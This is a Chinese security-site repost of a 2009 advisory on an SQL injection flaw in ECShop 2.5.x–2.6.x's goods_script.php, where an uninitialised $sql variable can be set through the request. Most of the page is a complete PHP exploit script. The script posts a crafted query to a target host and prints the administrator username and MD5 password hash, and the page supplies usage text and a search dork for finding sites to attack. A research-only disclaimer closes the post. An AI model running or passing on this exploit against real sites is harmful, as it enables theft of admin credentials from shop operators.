ECShop注射漏洞 's

admin
admin
admin
139544
文章
114
评论
2017年4月29日05:02:48评论236 views字数 1805阅读6分1秒阅读模式
摘要

作者:Ryat
2009-03-24影响2.5.x和2.6.x,其他版本未测试goods_script.php44行:
$sql没有初始化,很明显的一个漏洞:)

作者:Ryat
2009-03-24

影响2.5.x和2.6.x,其他版本未测试

goods_script.php44行:

    if (empty($_GET['type']))     {         ...     }     elseif ($_GET['type'] == 'collection')     {         ...     }     $sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);     $res = $db->query($sql);

$sql没有初始化,很明显的一个漏洞:)

EXP:

#!/usr/bin/php <?php  print_r(' +---------------------------------------------------------------------------+ ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://bbs.wolvez.org dork: "Powered by ECShop" +---------------------------------------------------------------------------+ '); /**  * works with register_globals = On  */ if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ ');     exit; }  error_reporting(7); ini_set('max_execution_time', 0);  $host = $argv[1]; $path = $argv[2];  $resp = send(); preg_match('#href="([/S]+):([a-z0-9]{32})"#', $resp, $hash);  if ($hash)     exit("Expoilt Success!/nadmin:/t$hash[1]/nPassword(md5):/t$hash[2]/n"); else     exit("Exploit Failed!/n");  function send() {     global $host, $path;      $cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';      $data = "POST ".$path."goods_script.php?type=".time()."  HTTP/1.1/r/n";     $data .= "Accept: */*/r/n";     $data .= "Accept-Language: zh-cn/r/n";     $data .= "Content-Type: application/x-www-form-urlencoded/r/n";     $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n";     $data .= "Host: $host/r/n";     $data .= "Content-Length: ".strlen($cmd)."/r/n";     $data .= "Connection: Close/r/n/r/n";     $data .= $cmd;      $fp = fsockopen($host, 80);     fputs($fp, $data);      $resp = '';      while ($fp && !feof($fp))         $resp .= fread($fp, 1024);      return $resp; }  ?>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月29日05:02:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ECShop注射漏洞 'shttps://cn-sec.com/archives/44582.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息